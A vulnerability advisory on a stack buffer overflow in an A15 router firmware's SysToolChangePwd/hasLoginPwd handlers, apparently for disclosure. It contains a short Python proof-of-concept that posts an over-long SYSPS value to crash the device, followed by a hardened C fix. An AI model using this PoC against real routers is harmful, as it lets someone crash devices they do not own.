We found a stack buffer overflow vulnerability in the **A15** (firmware version V15.13.07.13).
In the handler function for the action /goform/SysToolChangePwd, the user-controlled POST parameter “SYSPS” is stored into “sys.userpass” via SetValue.
That string is later loaded into the stack buffer pwd by the handler for /goform/hasLoginPwd. Because the length of “SYSPS” is never checked, the buffer is overflowed whenever the value is longer than 64 bytes.
```python
import requests

# Constructed session cookie; the handlers are reached with this uid value.
cookie = {"Cookie": "uid=1234"}

# Step 1: store an over-long "SYSPS" value (0x80 bytes, more than the 64-byte pwd buffer).
url1 = "http://192.168.17.221:80/goform/SysToolChangePwd"
data1 = {"SYSPS": "a" * 0x80}
response = requests.post(url1, cookies=cookie, data=data1)

# Step 2: trigger hasLoginPwd, which copies "sys.userpass" into the stack buffer pwd.
url2 = "http://192.168.17.221:80/goform/hasLoginPwd"
data2 = {}
response = requests.post(url2, cookies=cookie, data=data2)
print(response.text)
print(response)
```
After the PoC is executed, the router crashes because of the stack buffer overflow.
The GetValue function should accept a length argument (the size of the destination buffer) so that the copy is bounded and the overflow is avoided.
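A defensive counterpart to the pattern described above, added here as an example that is not the vendor's firmware code: `set_value`, `get_value_bounded`, `sys_tool_change_pwd` and `has_login_pwd` are assumed stand-ins for SetValue, GetValue and the two handlers, with a single-key store in place of the real configuration store. It shows both the length check at the input boundary and the bounded GetValue suggested above.

```c
#include <stddef.h>
#include <string.h>

#define PWD_BUF_LEN 64   /* size of the stack buffer "pwd" in hasLoginPwd */

/* Constructed stand-in for the firmware's key/value store; only one key
 * ("sys.userpass") is modelled. This is not the vendor's code. */
static char g_userpass[1024];

/* Stand-in for SetValue: stores the value as-is, like the original. */
static void set_value(const char *key, const char *val)
{
    (void)key;
    strncpy(g_userpass, val, sizeof g_userpass - 1);
    g_userpass[sizeof g_userpass - 1] = '\0';
}

/* Bounded replacement for GetValue: copies at most dst_len-1 bytes plus the
 * terminator and reports failure instead of overflowing the destination.
 * Returns 0 on success, -1 if the stored value does not fit in dst. */
static int get_value_bounded(const char *key, char *dst, size_t dst_len)
{
    (void)key;
    size_t n = strlen(g_userpass);
    if (dst_len == 0 || n >= dst_len)
        return -1;
    memcpy(dst, g_userpass, n + 1);
    return 0;
}

/* Hardened SysToolChangePwd: reject an over-long SYSPS before storing it,
 * so nothing larger than the downstream pwd buffer ever reaches the store. */
static int sys_tool_change_pwd(const char *sysps)
{
    if (sysps == NULL || strlen(sysps) >= PWD_BUF_LEN)
        return -1;
    set_value("sys.userpass", sysps);
    return 0;
}

/* Hardened hasLoginPwd: the stack buffer is still 64 bytes, but the copy is
 * bounded. Returns 1 if a password is set, 0 if empty, -1 if the value
 * would not fit (defence in depth should the input check ever be bypassed). */
static int has_login_pwd(void)
{
    char pwd[PWD_BUF_LEN];
    if (get_value_bounded("sys.userpass", pwd, sizeof pwd) != 0)
        return -1;
    return pwd[0] != '\0';
}
```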